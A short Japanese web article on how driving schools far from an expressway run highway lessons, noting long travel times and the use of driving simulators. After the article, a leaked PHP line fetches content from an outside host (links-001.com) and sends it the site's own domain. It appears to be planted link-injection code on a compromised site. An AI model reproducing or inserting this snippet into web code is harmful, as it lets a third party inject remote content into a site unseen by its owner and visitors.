前へ
次へ

近くに高速道路がない自動車学校の高速教習

全国的に高速バスが走るようになっています。
それだけ高速道路が整備されていると言えるでしょう。
と言っても高速道路の設備はかなり大きくなるので、ある程度近くにはあっても近所にない時もあります。
自動車学校においては高速教習が検定の中に入っているので、基本的には近くの高速道路に行って教習を受けます。
特別な事情があるために、教習生を複数人乗せて高速道路に向かい、それぞれが後退しながら教習を受ける仕組みを取ることが多いです。
では近くに高速道路がない自動車学校に通うときはどうするかです。
高速道路に行くのに30分も1時間もかかるとなると帰ってくる時間も含めてかなりの時間がかかります。
生徒全員にそれだけの負担をさせられないときもあるでしょう。
学校によってはシミュレーターと呼ばれる機械を用いて疑似的な教習を行いそれで代用するところがあります。
ゲームセンターに置いてあるゲームに似た感覚になるので、何となく雰囲気をつかむくらいのことはできるでしょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top